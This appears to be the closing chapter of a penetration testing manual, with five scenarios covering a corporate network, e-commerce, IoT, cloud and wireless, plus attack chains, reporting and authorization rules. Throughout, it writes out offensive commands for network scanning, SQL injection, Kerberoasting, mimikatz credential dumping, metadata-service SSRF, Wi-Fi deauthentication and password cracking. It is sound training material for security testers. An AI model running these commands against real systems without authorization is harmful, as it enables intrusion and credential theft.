Case Study Scenarios

Real-world penetration testing scenarios and methodologies

Scenario 1: Corporate Network Penetration

Target Environment:
  • Network: 192.168.10.0/24
  • Domain: corporate.local
  • Services: Web server, file server, domain controller

Phase 1: Reconnaissance

# Network discovery nmap -sn 192.168.10.0/24 # Port scanning nmap -sS -T4 -p- 192.168.10.0/24 # Service enumeration nmap -sV -sC 192.168.10.0/24
# Results: # 192.168.10.5 - Web server (80, 443) # 192.168.10.10 - File server (445, 21) # 192.168.10.15 - Domain controller (53, 88, 389, 445)

Phase 2: Vulnerability Assessment

# Web server analysis nikto -h http://192.168.10.5 dirb http://192.168.10.5 # SMB enumeration enum4linux 192.168.10.10 smbmap -H 192.168.10.10 # Domain controller enumeration ldapsearch -x -h 192.168.10.15 -s base

Phase 3: Exploitation

# Web application exploit (SQLi found) sqlmap -u "http://192.168.10.5/login.php" --data "username=admin&password=test" --dbs # File server access (weak SMB config) smbclient //192.168.10.10/shared -U guest% # Domain controller attack (Kerberoasting) impacket-GetUserSPNs corporate.local/user:password -dc-ip 192.168.10.15 -request

Phase 4: Post-Exploitation

# Privilege escalation on web server ./winpeas.exe # Domain enumeration bloodhound-python -u user -p password -ns 192.168.10.15 -d corporate.local -c all # Credential dumping mimikatz "sekurlsa::logonpasswords"

Scenario 2: E-commerce Website Assessment

Target: ecommerce.example.com

Phase 1: Information Gathering

# Subdomain enumeration sublist3r -d example.com amass enum -d example.com # Technology fingerprinting whatweb ecommerce.example.com # SSL/TLS analysis sslscan ecommerce.example.com testssl.sh ecommerce.example.com

Phase 2: Web Application Testing

# Directory discovery gobuster dir -u https://ecommerce.example.com -w /usr/share/wordlists/dirb/big.txt # Parameter fuzzing wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt --hh 0 https://ecommerce.example.com/search?FUZZ=test # SQL injection testing sqlmap -u "https://ecommerce.example.com/product.php?id=1" --batch --risk=3 --level=5 # XSS testing xsser --url "https://ecommerce.example.com/search.php?q=XSS"

Phase 3: Business Logic Testing

Payment bypass testing:
  1. Intercept payment request
  2. Modify amount to $0.01
  3. Forward request

Scenario 3: IoT Device Assessment

Target: Smart home devices on 192.168.1.0/24

Phase 1: Device Discovery

# Network scan for IoT devices nmap -sS -O 192.168.1.0/24 # Service fingerprinting nmap -sV --script banner 192.168.1.0/24 # IoT-specific scanning nmap --script http-title,http-headers 192.168.1.0/24 -p 80,443,8080,8443

Phase 2: IoT-Specific Attacks

# Default credential testing hydra -C /usr/share/wordlists/default-credentials.txt http-get://192.168.1.100 # Firmware analysis (if downloadable) binwalk firmware.bin strings firmware.bin | grep -i password # MQTT testing (if port 1883 open) mosquitto_sub -h 192.168.1.100 -t '#'

Scenario 4: Cloud Infrastructure Assessment

Target: AWS/Azure cloud environment

Phase 1: Cloud Reconnaissance

# S3 bucket enumeration aws s3 ls s3://target-bucket --no-sign-request # Subdomain enumeration for cloud services amass enum -d target.com | grep -E "(aws|azure|cloud)" # Certificate transparency for cloud resources curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | grep -E "(aws|azure|cloud)"

Phase 2: Cloud-Specific Attacks

# S3 bucket permissions testing aws s3 cp test.txt s3://target-bucket/test.txt --no-sign-request # SSRF to metadata service curl http://target.com/image?url=http://169.254.169.254/latest/meta-data/ # IAM privilege enumeration (if credentials obtained) aws sts get-caller-identity aws iam list-attached-user-policies --user-name target-user

Scenario 5: Wireless Network Assessment

Phase 1: Wireless Reconnaissance

# Put wireless card in monitor mode airmon-ng start wlan0 # Scan for access points airodump-ng wlan0mon # Target specific network airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture

Phase 2: Wireless Attacks

# Deauthentication attack aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon # WPS attack reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv # WPA/WPA2 cracking aircrack-ng -a2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt capture*.cap

Common Attack Chain Patterns

Pattern 1: External → Internal

1. Reconnaissance
Subdomain enumeration, port scanning
2. Web App Attack
SQL injection, file upload
3. Shell Access
Reverse shell via web vulnerability
4. Privilege Escalation
Local exploits, misconfigurations
5. Lateral Movement
Credential reuse, SMB relay
6. Domain Compromise
Kerberoasting, DCSync

Pattern 2: Phishing → Persistence

Attack Chain:
  1. Initial Access: Phishing email with malicious attachment
  2. Execution: PowerShell payload execution
  3. Privilege Escalation: UAC bypass, token impersonation
  4. Persistence: Registry autorun, scheduled task
  5. Collection: Keylogging, screenshot capture
  6. Exfiltration: DNS tunneling, HTTPS C2

Pattern 3: Physical → Digital

Attack Chain:
  1. Physical Access: Tailgating, lock picking
  2. USB Attack: Rubber Ducky, malicious USB
  3. Network Access: Ethernet connection, wireless
  4. Internal Enumeration: Network scanning, service discovery
  5. Credential Harvesting: Local password files, network sniffing
  6. Privilege Escalation: Kernel exploits, sudo abuse

Reporting & Documentation

Report Structure

Executive Summary
High-level overview for management
Methodology
Testing approach and scope
Technical Findings
Detailed vulnerability analysis
Recommendations
Remediation guidance and priorities

Finding Template

Each finding should include:
  • Title: Clear, descriptive title
  • Risk Rating: Critical/High/Medium/Low
  • Description: Technical explanation
  • Impact: Business impact assessment
  • Proof of Concept: Steps to reproduce
  • Recommendation: Specific remediation steps

Legal and Ethical Considerations

Authorization Requirements

Essential Requirements:
  • Written authorization from asset owner
  • Defined scope and limitations
  • Rules of engagement
  • Emergency contact procedures

Best Practices

Professional Guidelines:
  • Minimize system disruption
  • Maintain confidentiality
  • Document all activities
  • Report critical findings immediately
  • Secure all collected data

Additional Resources & Tools

Essential Tool Collections

Information Gathering
nmap, amass, sublist3r, theHarvester
Web Applications
burpsuite, gobuster, dirb, wfuzz
Password Attacks
hydra, medusa, john, hashcat
Post-Exploitation
mimikatz, bloodhound, impacket

Online Resources

CVE Details
Vulnerability database
NVD
National Vulnerability Database
Exploit-DB
Exploit database and archive
HackTheBox
Hands-on penetration testing labs
Congratulations! You have completed the comprehensive Network Penetration Testing Manual. This resource covers the essential methodologies, tools, and techniques needed for professional penetration testing engagements. Remember to always follow legal and ethical guidelines in your security testing activities.